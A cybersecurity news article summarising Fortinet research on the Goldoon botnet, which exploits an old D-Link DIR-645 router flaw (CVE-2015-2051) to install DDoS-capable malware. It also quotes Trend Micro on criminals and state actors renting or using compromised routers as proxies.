A never-before-seen botnet called Goldoon has been observed targeting D-Link routers with a nearly decade-old critical security flaw with the goal of using the compromised devices for further attacks.

The vulnerability in question is CVE-2015-2051 (CVSS score: 9.8), which affects D-Link DIR-645 routers and allows remote attackers to execute arbitrary commands by means of specially crafted HTTP requests.

“If a targeted device is compromised, attackers can gain complete control, enabling them to extract system information, establish communication with a C2 server, and then use these devices to launch further attacks, such as distributed denial-of-service (DDoS),” Fortinet FortiGuard Labs researchers Cara Lin and Vincent Li said.

Telemetry data from the network security company points to a spike in the botnet activity around April 9, 2024.

It all starts with the exploitation of CVE-2015-2051 to retrieve a dropper script from a remote server, which is responsible for responsible for downloading the next-stage payload for different Linux system architectures, including aarch64, arm, i686, m68k, mips64, mipsel, powerpc, s390x, sparc64, x86-64, sh4, riscv64, DEC Alpha, and PA-RISC.

The payload is subsequently launched on the compromised device and acts as a downloader for the Goldoon malware from a remote endpoint, after which the dropper removes the executed file and then deletes itself in a bid to cover up the trail and fly under the radar.

Any attempt to access the endpoint directly via a web browser displays the error message: “Sorry, you are an FBI Agent & we can’t help you 🙁 Go away or I will kill you :)”

Goldoon, besides setting up persistence on the host using various autorun methods, establishes contact with a command-and-control (C2) server to await commands for follow-up actions.

This includes an “astounding 27 different methods” to pull off DDoS flood attacks using various protocols like DNS, HTTP, ICMP, TCP, and UDP.

“While CVE-2015-2051 is not a new vulnerability and presents a low attack complexity, it has a critical security impact that can lead to remote code execution,” the researchers said.

The development comes as botnets continue to evolve and exploit as many devices as possible, even as cybercriminals and advanced persistent threat (APT) actors alike have demonstrated an interest in compromised routers for use as an anonymization layer.

“Cybercriminals rent out compromised routers to other criminals, and most likely also make them available to commercial residential proxy providers,” cybersecurity company Trend Micro said in a report.

“Nation-state threat actors like Sandworm used their own dedicated proxy botnets, while APT group Pawn Storm had access to a criminal proxy botnet of Ubiquiti EdgeRouters.”

Leave a Reply

Your email address will not be published. Required fields are marked *